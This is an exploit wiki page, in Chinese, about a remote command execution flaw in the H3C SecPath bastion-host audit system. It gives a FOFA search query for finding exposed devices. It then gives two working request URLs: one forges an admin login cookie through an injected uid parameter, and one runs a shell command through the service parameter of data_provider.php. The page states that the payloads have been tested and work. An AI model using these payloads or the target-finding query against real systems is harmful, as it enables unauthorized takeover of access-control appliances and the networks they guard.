H3C SecParh堡垒机 data provider.php 远程命令执行漏洞

This page is a translated version of the page H3C SecParh堡壘機 data provider.php 遠程命令執行漏洞 and the translation is 100% complete.

Other languages:

Chinese • ‎中文（中国大陆）‎ • ‎中文（台灣）‎

該漏洞已通過驗證。

本頁面的EXP/POC/Payload經測試可用，漏洞已經成功復現。

漏洞影响

H3C SecParh fortress machine

FOFA

app="H3C-SecPath-运维审计系统"

漏洞利用

通过任意用户登录获取Cookie：

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin

/audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(id)&identity_cond=&query_type=all&format=json&browse=true

参考

https://mp.weixin.qq.com/s/rt8lJaLUTVuZd187zrruMw

Anonymous

Search

H3C SecParh堡垒机 data provider.php 远程命令执行漏洞

Namespaces

More

Page actions

Contents

漏洞影响

FOFA

漏洞利用

参考

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

H3C SecParh堡垒机 data provider.php 远程命令执行漏洞

漏洞影响

FOFA

漏洞利用

参考

Navigation

Wiki tools

Page tools